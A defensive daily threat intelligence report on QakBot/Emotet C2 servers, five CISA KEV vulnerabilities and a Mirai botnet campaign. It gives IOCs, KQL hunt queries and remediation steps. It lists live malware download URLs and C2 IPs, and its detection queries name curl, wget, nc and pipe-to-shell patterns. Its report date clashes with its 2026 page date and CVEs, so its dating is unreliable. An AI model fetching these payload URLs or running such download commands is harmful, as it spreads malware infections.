โ† Back to Dashboard
May 10, 2026

Daily Threat Intelligence Report โ€” 2025-07-14

32
IOCs
12
TTPs
15
KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker, with four C2 IPs spanning US, UK, and Japanese infrastructure actively serving malicious traffic. Concurrently, CISA has added five critical vulnerabilities to the Known Exploited Vulnerabilities catalogue, including a critical unauthenticated RCE in Palo Alto Networks PAN-OS (CVE-2026-0300) and an authentication bypass in cPanel & WHM (CVE-2026-41940), both of which represent immediate exploitation risk to enterprise environments. A sustained Mirai botnet campaign targeting Linux-based IoT and server infrastructure is evidenced by multiple ELF-format samples and active malware download URLs observed via URLhaus and MalwareBazaar. SOC teams should immediately block all five Feodotracker C2 IPs, apply CISA KEV patches on an emergency basis, and activate KQL hunts across MDE and Sentinel environments.

#1

Active QakBot and Emotet C2 Infrastructure โ€” Multi-Region Banking Trojan Campaign

CRITICAL TA505

Feodotracker has confirmed five active command-and-control IP addresses in the last 24 hours serving QakBot (four IPs: 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and Emotet (one IP: 162.243.103.246) malware families, spanning US, UK, and Japanese hosting infrastructure. QakBot is a sophisticated banking trojan and initial access broker payload historically leveraged by TA505 and affiliated ransomware operators to establish persistent footholds prior to post-exploitation activity including credential harvesting, lateral movement, and ransomware deployment. Emotet, previously dismantled by law enforcement in 2021 and subsequently resurrected, operates as a modular malware loader and spam botnet that downloads secondary payloads including QakBot itself, representing a compounding risk when both families are simultaneously active. Any outbound connection from an enterprise endpoint to these five IPs should be treated as a confirmed compromise indicator requiring immediate endpoint isolation and forensic investigation.

๐Ÿ”ด Indicators of Compromise
IP 162.243.103.246 Emotet C2 server hosted in US โ€” Feodotracker confirmed active within last 24 hours
IP 50.16.16.211 QakBot C2 server hosted in US โ€” Feodotracker confirmed active within last 24 hours
IP 34.204.119.63 QakBot C2 server hosted in US โ€” Feodotracker confirmed active within last 24 hours
IP 178.62.3.223 QakBot C2 server hosted in GB โ€” Feodotracker confirmed active within last 24 hours
IP 27.133.154.218 QakBot C2 server hosted in JP โ€” Feodotracker confirmed active within last 24 hours
HASH 846a2e3a606c07e5497cda85364879b8ff31009a4526d75a7d1ab0d06c71b948 AsyncRAT EXE sample โ€” commonly deployed as secondary payload post-QakBot/Emotet infection; MalwareBazaar confirmed
HASH cceabfe8bae493c1eaa774971a5159a97a299babd4759a9ebc6016da6edc420d GCleaner dropper (MIX5.file) EXE โ€” GCleaner is a pay-per-install malware distributor known to drop QakBot and Emotet; MalwareBazaar confirmed
HASH fc5065fd93db1ea903ac75a2e383b147beb1234acab258494efbb84191ed872a GCleaner dropper (MIX4.file) EXE โ€” Secondary GCleaner sample corroborating active dropper campaign; MalwareBazaar confirmed
URL https://cmd.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL serving malicious OCX payload โ€” URLhaus confirmed; cloudflowops.co infrastructure used across multiple download endpoints
URL https://metaviewhub.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL โ€” same campaign GUID and payload as cmd.cloudflowops.co; URLhaus confirmed
URL https://sync.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL โ€” third cloudflowops.co subdomain serving identical google.ocx payload with same campaign GUID; URLhaus confirmed
๐ŸŸฃ MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment MITRE โ†’
T1071.001 Application Layer Protocol โ€” Web Protocols C2 MITRE โ†’
T1055 Process Injection MITRE โ†’
T1078 Valid Accounts MITRE โ†’
๐ŸŸข Hunt Queries
MDE Hunt for C2 Connections to QakBot and Emotet Feodotracker Infrastructure

Detects outbound network connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers observed active in the last 24 hours. Any match should be treated as a high-confidence compromise indicator.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect GCleaner Dropper and AsyncRAT Payload Execution by Hash

Identifies execution or file creation events matching confirmed MalwareBazaar hashes for GCleaner dropper samples and AsyncRAT payload associated with QakBot/Emotet delivery chains.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'cceabfe8bae493c1eaa774971a5159a97a299babd4759a9ebc6016da6edc420d',
    'fc5065fd93db1ea903ac75a2e383b147beb1234acab258494efbb84191ed872a',
    '846a2e3a606c07e5497cda85364879b8ff31009a4526d75a7d1ab0d06c71b948'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Downloads from cloudflowops.co Malware Distribution Infrastructure

Identifies network connections or file downloads from the cloudflowops.co malware distribution infrastructure confirmed by URLhaus, which is serving malicious google.ocx payloads across multiple subdomains.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has 'cloudflowops.co'
    or RemoteUrl has 'google.ocx'
    or RemoteUrl has 'c2cb43a1-3db9-486a-a707-ee88bcdb4813'
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDI Detect Lateral Movement via Excessive NTLM Authentication โ€” Post QakBot Credential Harvesting

Hunts for accounts performing high-volume NTLM authentications indicative of credential stuffing or lateral movement following QakBot credential harvest activity.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName), TargetDevices=make_set(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or UniqueDevices > 3
| order by LogonCount desc
SENTINEL Detect Connections to QakBot/Emotet C2 IPs Across All Log Sources

Broad Sentinel query across CommonSecurityLog, AzureFirewallLog, and DNS logs to identify any traffic to Feodotracker-confirmed QakBot and Emotet C2 infrastructure from any network segment.

let c2_ips = dynamic(['162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218']);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in (c2_ips) or SourceIP in (c2_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and NGF โ€” apply in both inbound and outbound directions
โ†’ IMMEDIATE: Submit all three MalwareBazaar hashes (cceabfe8..., fc5065fd..., 846a2e3a...) to EDR/AV platform for immediate blocking and retrospective scan across all endpoints
โ†’ IMMEDIATE: Block cloudflowops.co and all subdomains (cmd, metaviewhub, sync) at DNS, proxy, and web gateway level โ€” URLhaus confirmed active malware distribution
โ†’ IMMEDIATE: Run all five KQL hunt queries across MDE, MDI, and Sentinel environments and escalate any matches to Tier 2 for immediate investigation
โ†’ SHORT-TERM: Isolate any endpoint that generated a connection to the five C2 IPs โ€” treat as confirmed compromise, initiate forensic triage and memory acquisition
โ†’ SHORT-TERM: Review email gateway quarantine for Office documents with macros or HTML smuggling payloads received in the last 7 days โ€” expand hunting window to cover pre-detection activity
โ†’ SHORT-TERM: Validate that network segmentation prevents lateral NTLM propagation โ€” review MDI alert thresholds for account lateral movement detection
โ†’ LONG-TERM: Onboard Feodotracker feed as automated SIEM/SOAR enrichment source to ensure sub-hourly C2 IP blocklist updates without manual intervention
โ†’ LONG-TERM: Review GCleaner pay-per-install exposure โ€” audit software installation policies and application allowlisting to prevent dropper execution
#2

Critical CISA KEV Additions โ€” Unauthenticated RCE in PAN-OS and Authentication Bypass in cPanel/WHM Demand Emergency Patching

HIGH Unknown Threat Actor

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalogue today, with two representing the highest immediate risk to enterprise environments: CVE-2026-0300 in Palo Alto Networks PAN-OS, an out-of-bounds write vulnerability in the User-ID Authentication Portal (Captive Portal) service allowing unauthenticated remote code execution with root privileges on PA-Series and VM-Series firewalls; and CVE-2026-41940 in WebPros cPanel & WHM, an authentication bypass in the login flow enabling unauthenticated remote attackers to gain full control panel access. Additionally, CVE-2026-6973 in Ivanti EPMM allows authenticated remote code execution for any administrator-level user, CVE-2026-42208 in BerriAI LiteLLM enables SQL injection leading to credential theft from AI proxy infrastructure, and CVE-2026-31431 in the Linux Kernel enables local privilege escalation via incorrect resource transfer. CISA's inclusion of these vulnerabilities in the KEV catalogue confirms active in-the-wild exploitation; federal agencies are under BOD 22-01 mandate to patch, and private sector organizations should treat these as emergency remediation priorities.

๐Ÿ”ด Indicators of Compromise
CVE CVE-2026-0300 Palo Alto Networks PAN-OS โ€” unauthenticated out-of-bounds write RCE with root privileges via Captive Portal service on PA-Series and VM-Series firewalls; CISA KEV confirmed actively exploited
CVE CVE-2026-41940 WebPros cPanel & WHM and WP2 โ€” authentication bypass in login flow allowing unauthenticated remote full control panel access; CISA KEV confirmed actively exploited
CVE CVE-2026-6973 Ivanti EPMM โ€” improper input validation enabling remotely authenticated admin-level user to achieve RCE; CISA KEV confirmed actively exploited
CVE CVE-2026-42208 BerriAI LiteLLM โ€” SQL injection allowing attacker to read and potentially modify proxy database including managed credentials; CISA KEV confirmed actively exploited
CVE CVE-2026-31431 Linux Kernel โ€” incorrect resource transfer between spheres enabling local privilege escalation; CISA KEV confirmed actively exploited
URL https://getcfghubs.techopsruntime.pics/99c7fa93-4d32-47c2-84f9-163f7755f5e3/check.rock Active malware download URL hosted on techopsruntime.pics โ€” may be used for post-exploitation payload delivery following successful vulnerability exploitation; URLhaus confirmed
URL https://ipnodeclis.techopsruntime.pics/99c7fa93-4d32-47c2-84f9-163f7755f5e3/check.rock Active malware download URL โ€” second techopsruntime.pics subdomain serving identical check.rock payload with same campaign GUID; URLhaus confirmed
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1068 Exploitation for Privilege Escalation MITRE โ†’
T1110.002 Credential Access โ€” SQL Injection MITRE โ†’
T1105 Ingress Tool Transfer MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect Exploitation Attempts Against PAN-OS Captive Portal (CVE-2026-0300)

Identifies network activity patterns consistent with exploitation of the PAN-OS Captive Portal out-of-bounds write vulnerability โ€” specifically looking for anomalous process execution on firewall management systems or unexpected outbound connections indicative of post-exploitation activity.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where DeviceName has_any ('panos', 'panorama', 'firewall', 'pa-')
| where InitiatingProcessFileName in~ ('sshd', 'httpd', 'nginx', 'python', 'python3', 'sh', 'bash')
| where ProcessCommandLine has_any ('curl', 'wget', 'chmod', 'python', '/tmp/', 'base64', 'nc ', 'ncat')
| project TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated desc
MDE Detect Downloads from techopsruntime.pics Malware Distribution Infrastructure

Identifies connections to the URLhaus-confirmed techopsruntime.pics malware distribution infrastructure serving check.rock payloads, which may be downloaded as post-exploitation tools following KEV vulnerability exploitation.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has 'techopsruntime.pics'
    or RemoteUrl has 'check.rock'
    or RemoteUrl has '99c7fa93-4d32-47c2-84f9-163f7755f5e3'
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect cPanel and Ivanti EPMM Authentication Anomalies โ€” KEV CVE-2026-41940 and CVE-2026-6973

Identifies anomalous authentication patterns against cPanel/WHM and Ivanti EPMM management interfaces that may indicate exploitation of authentication bypass (CVE-2026-41940) or post-authentication RCE (CVE-2026-6973) vulnerabilities.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/cpanel', '/whm', '/cpsess', ':2082', ':2083', ':2086', ':2087', '/epmm', '/mifs', '/api/v1/admin')
| where Activity has_any ('401', '403', '200', 'authentication', 'login', 'bypass')
| summarize RequestCount=count(), UniqueSources=dcount(SourceIP), SourceIPs=make_set(SourceIP) by RequestURL, Activity, bin(TimeGenerated, 5m)
| where RequestCount > 10 or UniqueSources > 3
| order by RequestCount desc
SENTINEL Detect Linux Kernel Privilege Escalation Indicators โ€” CVE-2026-31431

Hunts for Linux host privilege escalation behavioural indicators consistent with CVE-2026-31431 exploitation โ€” specifically unexpected root-level process spawning from non-privileged parent processes.

Syslog
| where TimeGenerated > ago(24h)
| where Facility == 'kern' or ProcessName in ('sudo', 'su', 'pkexec', 'dbus-daemon')
| where SyslogMessage has_any ('privilege', 'escalat', 'setuid', 'capability', 'exploit', 'ptrace', 'userns')
    or SyslogMessage matches regex @'uid=0.*euid=0'
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| order by TimeGenerated desc
MDI Detect Anomalous Admin Account Activity Following Potential Ivanti EPMM Compromise

Identifies unusual administrative authentication patterns that may indicate post-exploitation lateral movement following Ivanti EPMM (CVE-2026-6973) compromise by a threat actor using harvested admin credentials.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where AccountName has_any ('admin', 'administrator', 'svc', 'service')
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName), UniqueIPs=dcount(IPAddress), DeviceList=make_set(DeviceName) by AccountDisplayName, AccountName
| where LogonCount > 10 or UniqueDevices > 5
| order by LogonCount desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Apply Palo Alto Networks PAN-OS patch for CVE-2026-0300 on all PA-Series and VM-Series firewalls โ€” until patch is available, restrict User-ID Authentication Portal (Captive Portal) to trusted zones only, and disable if not operationally required per CISA guidance
โ†’ IMMEDIATE: Apply WebPros cPanel & WHM patch for CVE-2026-41940 โ€” if patch unavailable, restrict cPanel/WHM management port access (2082/2083/2086/2087) to trusted management IP ranges only via firewall ACL
โ†’ IMMEDIATE: Apply Ivanti EPMM patch for CVE-2026-6973 โ€” audit all administrative accounts in EPMM for unauthorized access or suspicious activity in the last 72 hours
โ†’ IMMEDIATE: Block techopsruntime.pics and all subdomains at DNS and web proxy level โ€” URLhaus confirmed active malware distribution
โ†’ URGENT: Audit all BerriAI LiteLLM deployments for CVE-2026-42208 โ€” rotate all API credentials and service tokens managed by LiteLLM proxy immediately if patching cannot be completed within 4 hours
โ†’ URGENT: Apply Linux Kernel patches for CVE-2026-31431 on all internet-facing and high-value Linux hosts โ€” prioritize based on exposure profile
โ†’ SHORT-TERM: Run all five KQL queries across Sentinel, MDE, and MDI to identify exploitation indicators in the environment
โ†’ SHORT-TERM: Validate vulnerability scanner coverage for all five CISA KEV CVEs โ€” confirm asset inventory includes all PAN-OS, Ivanti EPMM, cPanel/WHM, LiteLLM, and Linux kernel versions in scope
โ†’ LONG-TERM: Integrate CISA KEV feed into vulnerability management platform for automated priority escalation of KEV-listed CVEs to P1/emergency remediation SLA
#3

Active Mirai/Gafgyt Botnet Expansion Campaign โ€” Multiple ELF Samples and IoT Exploitation Infrastructure Observed

MEDIUM Unknown Threat Actor

MalwareBazaar has confirmed four distinct Mirai-family ELF binary samples in the last 24 hours, including one tagged with Gafgyt (a competing IoT botnet family sharing infrastructure overlap with Mirai), indicating active botnet expansion recruitment targeting Linux-based IoT devices, routers, and unpatched servers. URLhaus corroborates this campaign with three active malware download endpoints serving shell scripts and binaries via non-standard high ports from IP addresses 119.52.128.201, 140.237.38.80, 117.26.82.69, and 42.235.88.133, with payloads including bin.sh (shell-based dropper) and unlabeled binary downloads. The CVE-2026-31431 Linux kernel privilege escalation vulnerability added to CISA KEV today may be leveraged by botnet operators to elevate privileges on partially compromised Linux hosts to achieve persistent Mirai implantation. GitHub maltrail updates to netsupport.txt and fakeapp.txt further suggest parallel delivery of remote access tools via fake application lures that may serve as the initial infection vector for compromised endpoints subsequently recruited into the botnet.

๐Ÿ”ด Indicators of Compromise
HASH 1394f1bb91eb2cb5bdc1dd3724f5b39302d5498d78ef44a688d955551c55b6b1 Mirai ELF binary โ€” UPX-decoded Linux botnet implant; MalwareBazaar confirmed
HASH 07207f62578f69a793e5f1560c923f24b3512e97b6f9034f5df797f7eb253d74 Mirai/Gafgyt ELF binary โ€” UPX-packed; tagged Gafgyt indicating possible dual-family infrastructure overlap; MalwareBazaar confirmed
HASH 42e118f15398e7467639346573f8934badb6ceee6b4a666e5d8690dd292c34f9 Mirai ELF binary โ€” uncompressed Linux botnet implant; MalwareBazaar confirmed
HASH 742802ec096b21b214403c59685216f585a48def35769d8a75ff805a8d5e690a Mirai ELF binary โ€” Linux botnet implant variant; MalwareBazaar confirmed
HASH b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f NanoCore RAT EXE โ€” Windows remote access trojan; may be used in parallel campaign delivering RATs via fake application lures per maltrail fakeapp.txt update; MalwareBazaar confirmed
IP 119.52.128.201 Active malware download server โ€” serving both /i binary and /bin.sh dropper via non-standard port 54273; URLhaus confirmed
IP 140.237.38.80 Active malware download server โ€” serving /i binary payload via non-standard port 56569; URLhaus confirmed
IP 117.26.82.69 Active malware download server โ€” serving bin.sh shell dropper via non-standard port 50794; URLhaus confirmed
IP 42.235.88.133 Active malware download server โ€” serving /i binary payload via non-standard port 55090; URLhaus confirmed
URL http://119.52.128.201:54273/bin.sh Active Mirai dropper shell script download URL โ€” direct IP-based delivery on non-standard high port to evade domain-based filtering; URLhaus confirmed
URL http://117.26.82.69:50794/bin.sh Active Mirai dropper shell script download URL โ€” secondary distribution server for bin.sh payload; URLhaus confirmed
URL http://119.52.128.201:54273/i Active Mirai binary download URL โ€” unlabeled binary payload served alongside bin.sh from same server; URLhaus confirmed
URL http://140.237.38.80:56569/i Active Mirai binary download URL โ€” additional distribution server; URLhaus confirmed
URL http://42.235.88.133:55090/i Active Mirai binary download URL โ€” fourth distribution server for /i payload; URLhaus confirmed
๐ŸŸฃ MITRE ATT&CK TTPs
T1595.001 Active Scanning โ€” Scanning IP Blocks MITRE โ†’
T1496 Resource Hijacking MITRE โ†’
T1059.004 Command and Scripting Interpreter โ€” Unix Shell MITRE โ†’
T1110.001 Brute Force โ€” Password Guessing MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect Mirai/Gafgyt ELF Binary File Creation and Execution by Hash

Identifies creation or execution of confirmed Mirai and Gafgyt ELF binaries on managed Linux endpoints using MalwareBazaar-confirmed SHA256 hashes.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    '1394f1bb91eb2cb5bdc1dd3724f5b39302d5498d78ef44a688d955551c55b6b1',
    '07207f62578f69a793e5f1560c923f24b3512e97b6f9034f5df797f7eb253d74',
    '42e118f15398e7467639346573f8934badb6ceee6b4a666e5d8690dd292c34f9',
    '742802ec096b21b214403c59685216f585a48def35769d8a75ff805a8d5e690a',
    'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Connections to Mirai Payload Distribution Servers โ€” URLhaus Confirmed IPs

Identifies outbound network connections to all four URLhaus-confirmed Mirai payload distribution servers delivering /i binaries and bin.sh shell droppers.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('119.52.128.201', '140.237.38.80', '117.26.82.69', '42.235.88.133')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Shell-Based Malware Download Patterns โ€” curl/wget Pipeline Execution

Hunts for curl or wget execution patterns consistent with Mirai's self-propagation mechanism โ€” specifically downloads from non-standard high ports or pipes to shell execution that match the bin.sh delivery pattern confirmed by URLhaus.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ('wget', 'curl', 'sh', 'bash')
| where ProcessCommandLine has_any (
    '119.52.128.201',
    '140.237.38.80',
    '117.26.82.69',
    '42.235.88.133',
    'bin.sh',
    '/tmp/',
    '/dev/shm/',
    '| bash',
    '| sh',
    'chmod +x'
)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect Mirai Distribution IP Access Across All Network Logs

Broad Sentinel hunt across all log sources for connections to or from the four URLhaus-confirmed Mirai payload distribution IPs, covering firewall, proxy, and endpoint telemetry.

let mirai_ips = dynamic(['119.52.128.201', '140.237.38.80', '117.26.82.69', '42.235.88.133']);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in (mirai_ips) or SourceIP in (mirai_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
SENTINEL Detect NanoCore RAT Execution โ€” Fake Application Delivery Vector

Identifies file creation or process execution matching the NanoCore RAT hash from MalwareBazaar, correlated with maltrail fakeapp.txt updates indicating active fake application delivery campaigns.

SecurityEvent
| where TimeGenerated > ago(24h)
| where EventID in (4688, 4663)
| where CommandLine has_any (
    'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f',
    'NanoCore',
    'nanocore'
)
union (
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f'
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
)
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all four URLhaus-confirmed malware distribution IPs (119.52.128.201, 140.237.38.80, 117.26.82.69, 42.235.88.133) at perimeter firewall on all ports โ€” these IPs are actively serving Mirai payloads
โ†’ IMMEDIATE: Submit all five MalwareBazaar hashes (1394f1bb..., 07207f62..., 42e118f1..., 742802ec..., b03c2100...) to EDR/AV for immediate blocking and retrospective scan
โ†’ IMMEDIATE: Run MDE KQL query for shell-based malware download patterns โ€” any match involving /tmp/ or /dev/shm/ binary creation should trigger immediate Linux host isolation
โ†’ SHORT-TERM: Audit all Linux servers and IoT devices for Telnet service exposure โ€” disable Telnet on all managed assets and restrict SSH to key-based authentication only, eliminating Mirai's primary brute-force propagation vector
โ†’ SHORT-TERM: Review network flow data for anomalous outbound traffic patterns from Linux servers and IoT segments โ€” Mirai-recruited hosts will exhibit periodic C2 beaconing and potential DDoS traffic generation
โ†’ SHORT-TERM: Apply Linux Kernel patch for CVE-2026-31431 (CISA KEV) on all Linux servers โ€” this vulnerability may be used by botnet operators to escalate privileges on partially compromised hosts
โ†’ SHORT-TERM: Implement network segmentation to isolate IoT devices from enterprise server infrastructure โ€” prevent lateral spread of Mirai infection across network segments
โ†’ LONG-TERM: Deploy runtime security tooling (Falco, Wazuh) on all Linux hosts to detect ELF binary execution from world-writable directories and anomalous shell command chains
โ†’ LONG-TERM: Evaluate deployment of network-based anomaly detection to identify Mirai-style scanning and brute-force activity originating from internal hosts that have been recruited into the botnet